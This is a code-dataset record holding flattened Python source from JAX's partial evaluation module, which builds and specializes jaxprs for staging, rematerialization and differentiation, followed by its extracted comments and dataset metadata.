Otherwise, all the outputs are unknown.""" consts = tuple(t.pval.get_known() for t in tracers) if all(c is not None for c in consts): return primitive.bind(*consts, **params) tracers = map(self.instantiate_const, tracers) avals = [t.aval for t in tracers] out_aval = primitive.abstract_eval(*avals, **params) if primitive.multiple_results: out_tracers = [JaxprTracer(self, PartialVal.unknown(aval), None) for aval in out_aval] eqn = new_eqn_recipe(tracers, out_tracers, primitive, params) for t in out_tracers: t.recipe = eqn return out_tracers else: out_tracer = JaxprTracer(self, PartialVal.unknown(out_aval), None) out_tracer.recipe = new_eqn_recipe(tracers, [out_tracer], primitive, params) return out_tracer def process_call(self, call_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if (self.master.trace_type is StagingJaxprTrace and call_primitive in staged_out_calls): tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) if call_primitive in call_partial_eval_rules: return call_partial_eval_rules[call_primitive](self, call_primitive, f, tracers, params) in_pvs, in_consts = unzip2([t.pval for t in tracers]) fun, aux = partial_eval(f, self, in_pvs) out_flat = call_primitive.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env_tracers = map(self.full_raise, env) out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) if not jaxpr.eqns: env = {core.unitvar: core.unit} map(env.setdefault, jaxpr.invars, (*env_tracers, *tracers)) map(env.setdefault, jaxpr.constvars, consts) return [pv_const if pv is None else v.val if type(v) is Literal else env[v] for v, pv, pv_const in zip(jaxpr.outvars, out_pvs, out_pv_consts)] const_tracers = map(self.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, 
out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_call(self, call_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs, out_pv_consts = unzip2(t.pval for t in out_tracers) out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) env_tracers = map(trace.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_map(self, map_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if self.master.trace_type is StagingJaxprTrace: tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) in_pvs, in_consts = unzip2([t.pval for t in tracers]) reduced_pvs = [None if pv is None else _mapped_aval(params['axis_size'], pv) if m else pv for pv, m in zip(in_pvs, params['mapped_invars'])] fun, aux = partial_eval(f, self, reduced_pvs) out_flat = map_primitive.bind(fun, *in_consts, **params) out_pvs_reduced, jaxpr, env = aux() out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvs = [None if pv is None else 
_unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] const_tracers = map(self.new_instantiated_const, consts) env_tracers = map(self.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] # The `jaxpr` already contains the env_vars at start of invars new_params = dict(params, mapped_invars=((True,) * len(const_tracers) + (False,) * len(env_tracers) + params['mapped_invars']), call_jaxpr=lifted_jaxpr) assert (len(new_params['mapped_invars']) == len(const_tracers) + len(env_tracers) + len(tracers)) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_map(self, map_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs_reduced, out_pv_consts = unzip2(t.pval for t in out_tracers) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) # The `jaxpr` already contains the env_vars at start of invars lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, mapped_invars=tuple([True] * len(const_tracers) + [False] * len(env)), call_jaxpr=lifted_jaxpr) env_tracers = map(trace.full_raise, env) eqn = new_eqn_recipe(it.chain(const_tracers, env_tracers), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_custom_jvp_call(self, prim, fun, jvp, 
tracers): # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees): # See comment in the above process_custom_jvp_call method. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). class StagingJaxprTrace(JaxprTrace): pass def _mapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): # might be raising abstraction level from Concrete here assert aval.shape[0] == size return ShapedArray(aval.shape[1:], aval.dtype) else: raise TypeError(aval) def _unmapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): return ShapedArray((size,) + aval.shape, aval.dtype) else: raise TypeError(aval) custom_partial_eval_rules: Dict[core.Primitive, Callable] = {} call_partial_eval_rules: Dict[core.Primitive, Callable] = {} staged_out_calls: Set[core.Primitive] = set() def partial_eval(f, trace, pvs: Sequence[Optional[AbstractValue]], instantiate=False): f = trace_to_subjaxpr(f, trace.master, instantiate) return partial_eval_wrapper(f, tuple(pvs)) @lu.transformation_with_aux def partial_eval_wrapper(avals: Sequence[Optional[AbstractValue]], *consts): py_args = (map(PartialVal, zip(avals, consts)),) jaxpr, (out_pvals, consts, env) = yield py_args, {} out_pvs, out_consts = unzip2(out_pvals) out = tuple(out_consts) + tuple(consts) # TODO: can consts be traced? 
yield out, (out_pvs, jaxpr, env) def abstract_eval_fun(fun, *avals, **params): pvals_in = [PartialVal.unknown(a) for a in avals] _, pvals_out, _ = trace_to_jaxpr(lu.wrap_init(fun, params), pvals_in, instantiate=True, stage_out=True) avals_out, _ = unzip2(pvals_out) for aval_out in avals_out: assert isinstance(aval_out, AbstractValue) # instantiate=True return avals_out class JaxprTracer(Tracer): __slots__ = ['pval', 'recipe'] def __init__(self, trace, pval: PartialVal, recipe): assert isinstance(pval, PartialVal) pv, const = pval if isinstance(const, Tracer) and const._trace.level >= trace.level: raise core.escaped_tracer_error( "Tracer from a higher level: {} in trace {}".format(const, trace)) self._trace = trace self.pval = pval self.recipe = recipe def __repr__(self): return 'Traced<{}:{}>'.format(self.aval, self._trace) @property def aval(self): return self.pval.get_aval() @property def parents(self): if isinstance(self.recipe, JaxprEqnRecipe): return self.recipe.invars else: return [] def full_lower(self): known = self.pval.get_known() if known is not None: return core.full_lower(known) else: return self # TODO(necula): this should return a TypedJaxpr # TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace def trace_to_jaxpr(fun: lu.WrappedFun, pvals: Sequence[PartialVal], instantiate: Union[bool, Sequence[bool]] = False, stage_out=False, bottom=False, trace_type: Optional[Type[Trace]] = None) \ -> Tuple[Jaxpr, Tuple[PartialVal, ...], Tuple[core.Value, ...]]: """Traces a function into a Jaxpr, given PartialVals for inputs. `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see comments for that class). Returns (`jaxpr`, `out_pvals`, `consts`). The `jaxpr` contains only the computation that depends on unknown inputs. The `out_pvals` are the PartialVal for the outputs. 
The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. 
let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars """ trace_type = trace_type or (StagingJaxprTrace if stage_out else JaxprTrace) with new_master(trace_type, bottom=bottom) as master: fun = trace_to_subjaxpr(fun, master, instantiate) jaxpr, (out_pvals, consts, env) = fun.call_wrapped(pvals) assert not env del master return jaxpr, out_pvals, consts @lu.transformation def trace_to_subjaxpr(master: core.MasterTrace, instantiate: Union[bool, Sequence[bool]], pvals: Sequence[PartialVal]): assert all([isinstance(pv, PartialVal) for pv in pvals]), pvals trace = JaxprTrace(master, core.cur_sublevel()) in_tracers = map(trace.new_arg, pvals) ans = yield in_tracers, {} instantiate = [instantiate] * len(ans) if isinstance(instantiate, bool) else instantiate out_tracers = map(trace.full_raise, map(core.full_lower, ans)) out_tracers = map(partial(instantiate_const_at, trace), instantiate, out_tracers) jaxpr, consts, env = tracers_to_jaxpr(in_tracers, out_tracers) out_pvals = [t.pval for t in out_tracers] del trace, in_tracers, out_tracers yield jaxpr, (out_pvals, consts, env) def instantiate_const_at(trace, instantiate: bool, tracer): if instantiate: return trace.instantiate_const(trace.full_raise(tracer)) else: return tracer FreeVar = namedtuple('FreeVar', ['val']) ConstVar = namedtuple('ConstVar', ['val']) LambdaBinding = namedtuple('LambdaBinding', []) JaxprEqnRecipe = namedtuple('JaxprEqnRecipe', ['eqn_id', 'invars', 'outvars', 'primitive', 'params']) def new_eqn_recipe(invars, outvars, primitive, params): """Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. 
params: the primitive params """ # TODO(necula): move these checks to core.check_jaxpr, and call in more places if primitive.call_primitive or primitive.map_primitive: assert "call_jaxpr" in params if primitive.map_primitive: assert "mapped_invars" in params return JaxprEqnRecipe(object(), tuple(invars), map(ref, outvars), primitive, params) def recipe_to_eqn(unused_var, getvar, recipe): _, in_tracers, out_tracer_refs, primitive, params = recipe out_tracers = [t_ref() for t_ref in out_tracer_refs] invars = [getvar(t) for t in in_tracers] outvars = [unused_var() if t is None else getvar(t) for t in out_tracers] return new_jaxpr_eqn(invars, outvars, primitive, params) def tracers_to_jaxpr(in_tracers, out_tracers): """Constructs Jaxpr given tracers for inputs and outputs. Params: in_tracers: the tracers that were created for the function inputs out_tracers: the tracers that were output by the function. Returns: a triple of a `Jaxpr`, a list of constant values corresponding to the `constvars` in the returned Jaxps, and a list of environment values. The vars for the environment values have been prepended to the Jaxpr's `invars`. 
""" newvar = core.gensym('') t_to_var = {} def getvar(t): var = t_to_var.get(id(t)) if var is None: aval = t.pval.get_aval() if not t.pval.is_known() else abstract_unit var = t_to_var[id(t)] = newvar(aval) return var sorted_tracers = toposort(out_tracers) invars = map(getvar, in_tracers) eqns = [] env = {} consts = {} const_to_var = {} def getconstvar(c): var = const_to_var.get(id(c)) if var is None: var = const_to_var[id(c)] = newvar(get_aval(c)) return var processed_eqn_ids = set() for t in sorted_tracers: recipe = t.recipe if isinstance(recipe, JaxprEqnRecipe): if recipe.eqn_id not in processed_eqn_ids: eqns.append(recipe_to_eqn(lambda: newvar(core.abstract_unit), getvar, recipe)) processed_eqn_ids.add(recipe.eqn_id) elif isinstance(recipe, LambdaBinding): if not any(t is in_tracer for in_tracer in in_tracers): raise core.escaped_tracer_error( "Tracer not among input tracers {}".format(t)) assert in_tracers, "Lambda binding with no args" elif isinstance(recipe, FreeVar): env[getvar(t)] = recipe.val elif isinstance(recipe, ConstVar): v = t_to_var[id(t)] = getconstvar(recipe.val) consts[v] = recipe.val elif isinstance(recipe, Literal): t_to_var[id(t)] = recipe elif recipe is unit: t_to_var[id(t)] = unitvar else: raise TypeError(recipe) env_vars, env_vals = unzip2(env.items()) const_vars, const_vals = unzip2(consts.items()) # The env_vars are pre-pended to the invars jaxpr = Jaxpr(const_vars, list(it.chain(env_vars, invars)), list(map(getvar, out_tracers)), eqns) core.skip_checks or core.check_jaxpr(jaxpr) return jaxpr, const_vals, env_vals @cache() def convert_constvars_jaxpr(jaxpr): """Moves the constvars to the start of invars.""" core.skip_checks or core.check_jaxpr(jaxpr) lifted_jaxpr = Jaxpr(constvars=(), invars=jaxpr.constvars + jaxpr.invars, outvars=jaxpr.outvars, eqns=jaxpr.eqns) core.skip_checks or core.check_jaxpr(lifted_jaxpr) return lifted_jaxpr def partial_eval_jaxpr(jaxpr: TypedJaxpr, unknowns: Sequence[bool], instantiate: Union[bool, 
Sequence[bool]], trace_type: Optional[Type[core.Trace]] ) -> Tuple[TypedJaxpr, TypedJaxpr, Sequence[bool]]: """Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) """ f = lu.wrap_init(core.jaxpr_as_fun(jaxpr)) cell = [] def fun(*vals): pvals = [PartialVal.unknown(aval) if uk else PartialVal.known(val) for aval, val, uk in zip(jaxpr.in_avals, vals, unknowns)] jaxpr_2, out_pvals_2, consts_2 = trace_to_jaxpr(f, pvals, instantiate=instantiate, trace_type=trace_type) out_pvs_2, out_consts_2 = unzip2(out_pvals_2) cell.append((out_pvs_2, jaxpr_2, len(consts_2))) return out_consts_2 + consts_2 # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. 
pvals = [PartialVal.unknown(abstract_unit) if uk else PartialVal.unknown(aval) for aval, uk in zip(jaxpr.in_avals, unknowns)] jaxpr_1, out_pvals, consts_1 = trace_to_jaxpr(lu.wrap_init(fun), pvals, instantiate=True) (out_pvs_2, jaxpr_2, num_res), = cell assert len(jaxpr_2.constvars) == num_res # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 jaxpr_2 = convert_constvars_jaxpr(jaxpr_2) jaxpr_2.invars = jaxpr_2.invars[num_res:] + jaxpr_2.invars[:num_res] for var, unknown in zip(jaxpr_2.invars[:len(unknowns)], unknowns): if not unknown: var.aval = abstract_unit uk_out = [pv is not None for pv in out_pvs_2] in_avals_1, in_avals_2 = unzip2(map(_split_aval, unknowns, jaxpr.in_avals)) out_avals_1, out_avals_2 = unzip2(map(_split_aval, uk_out, jaxpr.out_avals)) # out_avals_1 and in_avals_2 need the residuals added out_pvs, _ = unzip2(out_pvals) res_avals = out_pvs[len(jaxpr.out_avals):] assert len(res_avals) == num_res out_avals_1 = out_avals_1 + res_avals in_avals_2 = in_avals_2 + res_avals typed_jaxpr_1 = TypedJaxpr(jaxpr_1, consts_1, in_avals_1, out_avals_1) typed_jaxpr_2 = TypedJaxpr(jaxpr_2, (), in_avals_2, out_avals_2) return typed_jaxpr_1, typed_jaxpr_2, uk_out def _split_aval(unknown, aval): return (abstract_unit, aval) if unknown else (aval, abstract_unit) remat_call_p = core.Primitive('remat_call') remat_call_p.call_primitive = True remat_call = partial(core.call_bind, remat_call_p) remat_call_p.def_custom_bind(remat_call) remat_call_p.def_impl(core.call_impl) remat_call_p.multiple_results = True def _remat_partial_eval(trace, _, f, tracers, params): concrete = params['concrete'] # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. 
# Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. if concrete: instantiated_tracers = map(trace.instantiate_const, tracers) else: instantiated_tracers = map(trace.instantiate_const_abstracted, tracers) # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. in_pvs, in_consts = unzip2(t.pval for t in instantiated_tracers) fun, aux = partial_eval(f, trace, in_pvs) with core.initial_style_staging(): out_flat = remat_call_p.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env = map(trace.full_raise, env) out_pval_consts1, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvals1 = [PartialVal((pv, const)) for pv, const in zip(out_pvs, out_pval_consts1)] # Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. in_avals = ([raise_to_shaped(t.pval.get_aval()) for t in env] + [raise_to_shaped(pv) for pv in in_pvs]) out_avals = [raise_to_shaped(pv if pv is not None else abstract_unit if var is unitvar else get_aval(var.val) if type(var) is Literal else get_aval(const)) for var, pv, const in zip(jaxpr.outvars, out_pvs, out_pval_consts1)] typed_jaxpr = core.TypedJaxpr(jaxpr, consts, in_avals, out_avals) in_unknowns = [t.pval[0] is not None for t in it.chain(env, tracers)] jaxpr_1, jaxpr_2, out_unknowns = partial_eval_jaxpr(typed_jaxpr, in_unknowns, instantiate=False, trace_type=trace.master.trace_type) num_res = len(jaxpr_1.out_avals) - len(jaxpr_2.out_avals) # First, we prune the jaxpr to be staged out not to have too many outputs. 
typed_jaxpr = _dce_jaxpr(typed_jaxpr, out_unknowns) # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). to_compute = [not uk and type(pv) is not ConcreteArray for uk, pv in zip(out_unknowns, out_pvs)] jaxpr_1_primals = _dce_jaxpr(jaxpr_1, to_compute + [False] * num_res) _, in_consts = unzip2(t.pval for t in it.chain(env, tracers)) out_pval_consts2 = core.jaxpr_as_fun(jaxpr_1_primals)(*in_consts)[:-num_res or None] out_pvals = map(_reconstruct_pval, out_pvals1, out_pval_consts2, out_unknowns) # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. instantiated_tracers = env + instantiated_tracers const_tracers = map(trace.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(typed_jaxpr.jaxpr) out_tracers = [JaxprTracer(trace, out_pval, None) for out_pval in out_pvals] new_params = dict(params, call_jaxpr=lifted_jaxpr) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, instantiated_tracers)), out_tracers, remat_call_p, new_params) for t in out_tracers: t.recipe = eqn return out_tracers call_partial_eval_rules[remat_call_p] = _remat_partial_eval def _dce_jaxpr(typed_jaxpr, outputs): # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. 
# TODO(mattjj): better DCE jaxpr = typed_jaxpr.jaxpr outvars, out_avals = jaxpr.outvars, typed_jaxpr.out_avals out_pairs = [(var, aval) if output else (unitvar, core.abstract_unit) for var, aval, output in zip(outvars, out_avals, outputs)] new_outvars, new_out_avals = unzip2(out_pairs) needed_vars = {v for v in new_outvars if type(v) is not Literal} new_eqns = [] for eqn in jaxpr.eqns[::-1]: if set(eqn.outvars) & needed_vars: new_eqns.append(eqn) needed_vars.update(v for v in eqn.invars if type(v) is not Literal) new_eqns = new_eqns[::-1] new_jaxpr = core.Jaxpr(jaxpr.constvars, jaxpr.invars, new_outvars, new_eqns) return core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, typed_jaxpr.in_avals, new_out_avals) def _reconstruct_pval(pval1: PartialVal, const2: core.Value, unknown: bool): pv1, _ = pval1 if unknown or pval1.is_known(): return pval1 else: if type(pv1) is ConcreteArray: return PartialVal.known(pv1.val) else: return PartialVal.known(const2) def move_binders_to_front(typed_jaxpr: TypedJaxpr, to_move: Sequence[bool]) -> TypedJaxpr: """Reorder the `invars` to move to front the ones for which `to_move` is True.""" assert not typed_jaxpr.jaxpr.constvars assert len(typed_jaxpr.in_avals) == len(to_move) new_invars = _move_to_front(typed_jaxpr.jaxpr.invars, to_move) new_jaxpr = core.Jaxpr((), new_invars, typed_jaxpr.jaxpr.outvars, typed_jaxpr.jaxpr.eqns) new_in_avals = _move_to_front(typed_jaxpr.in_avals, to_move) new_typed_jaxpr = core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, new_in_avals, typed_jaxpr.out_avals) return new_typed_jaxpr def _move_to_front(lst: Sequence, to_move: Sequence[bool]) -> Sequence: return ([elt for elt, move in zip(lst, to_move) if move] + [elt for elt, move in zip(lst, to_move) if not move])
en
0.832567
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. # type checks # invariant checks Get the known value, if known, else None. Get the AbstractValue either directly for unknown values, or from the known constant. Either the stored known value, or the given 'val'. # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the `JaxprTrace` class. By default, if all the input tracers are known, then execute the primitive and all the ouputs are known. Otherwise, all the outputs are unknown. 
# The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. # See comment in the above process_custom_jvp_call method. # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). # might be raising abstraction level from Concrete here # TODO: can consts be traced? # instantiate=True # TODO(necula): this should return a TypedJaxpr # TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace Traces a function into a Jaxpr, given PartialVals for inputs. `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see comments for that class). Returns (`jaxpr`, `out_pvals`, `consts`). The `jaxpr` contains only the computation that depends on unknown inputs. The `out_pvals` are the PartialVal for the outputs. The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. 
Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. params: the primitive params # TODO(necula): move these checks to core.check_jaxpr, and call in more places Constructs Jaxpr given tracers for inputs and outputs. Params: in_tracers: the tracers that were created for the function inputs out_tracers: the tracers that were output by the function. Returns: a triple of a `Jaxpr`, a list of constant values corresponding to the `constvars` in the returned Jaxps, and a list of environment values. The vars for the environment values have been prepended to the Jaxpr's `invars`. # The env_vars are pre-pended to the invars Moves the constvars to the start of invars. Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. 
Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 # out_avals_1 and in_avals_2 need the residuals added # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. # Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. 
# Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. # First, we prune the jaxpr to be staged out not to have too many outputs. # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. # TODO(mattjj): better DCE Reorder the `invars` to move to front the ones for which `to_move` is True.
1.810279
2
resto_client/functions/utils.py
CNES/resto_client
6
6627902
